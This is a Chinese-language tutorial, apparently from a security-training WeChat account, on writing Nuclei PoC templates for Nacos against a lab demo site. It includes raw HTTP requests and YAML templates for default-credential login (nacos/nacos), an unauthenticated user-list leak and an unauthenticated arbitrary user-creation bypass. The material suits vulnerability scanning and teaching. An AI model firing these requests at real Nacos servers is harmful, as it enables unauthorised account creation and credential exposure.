Nuclei Poc开发

本文由掌控安全学院 - 不知江月待何人 投稿

1、Poc开发工具介绍

Nuclei：https://nuclei.projectdiscovery.io/
Cloud Platfrom云平台：https://cloud.projectdiscovery.io/

2、目标站点简介

目标演示站点：http://glkb-jqe1.aqlab.cn/nacos/#/login
指纹：Nacos
已知常用漏洞利用：Nacos弱口令 账密：nacos/nacos
Nacos 敏感信息泄露 /nacos/v1/auth/users?pageNo=1&pageSize=9
Nacos 任意用户创建：/nacos/v1/auth/users?accessToken=

3、自定义Poc

Nacos通用弱口令：
报文：

POST /nacos/v1/auth/users/login HTTP/1.1
Host: glkb-jqe1.aqlab.cn
Content-Length: 42
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://glkb-jqe1.aqlab.cn
Referer: http://glkb-jqe1.aqlab.cn/nacos/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=nacos&password=nacos

返回JWT

匹配规则：https://docs.projectdiscovery.io/templates/reference/matchers

提取规则：https://docs.projectdiscovery.io/templates/reference/extractors

根据响应body，提取jwt全段值或部分值均可
RE：(eyJ[A-Za-z0-9-]{10,}.[A-Za-z0-9.-]{10,}|eyJ[A-Za-z0-9/+-]{10,}.[A-Za-z0-9./+-]{10,})
效果demo：

Nacos Information敏感信息泄露

GET /nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken= HTTP/1.1
Host: glkb-jqe1.aqlab.cn
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

demo

id: Nacos-InformationForUser

info:
  name: Nacos-InformationForUser
  author: xxx
  severity: info
  description: description
  reference:
    - https://
  tags: nacos

requests:
  - raw:
      - |+
        GET /nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken= HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_any(body,"username","password")  && status_code==200

Nacos AuthUserBypass

POST /nacos/v1/auth/users?accessToken= HTTP/1.1
Host: glkb-jqe1.aqlab.cn
Content-Length: 25
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=222&password=222

demo

id: Nacos-NotAuth-AnyUserCreate

info:
  name: Nacos-NotAuth-AnyUserCreate
  author: xxx
  severity: info
  description: description
  reference:
    - https://
variables:
  username: "{{to_lower(rand_base(6))}}"
  tags: nacos

requests:
  - raw:
      - |-
        POST /nacos/v1/auth/users?accessToken= HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Length: 32

        username={{username}}&password={{username}}
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_any(body,"ok")  && status_code==200

Workflow工作流

id: Nacos-Workflower

info:
  name: Nacos-Workflower
  author: xxx
  severity: info
  description: Description of the Template
workflows:
  - template: pathNacos-NotAuth-AnyUserCreate.yaml
  - template: pathNacos-InformationForUser.yaml
  - tags: nacos

DEMO

申明：本公众号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，

所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法.

<span

原文始发于微信公众号（掌控安全EDU）：Nuclei Poc开发

</span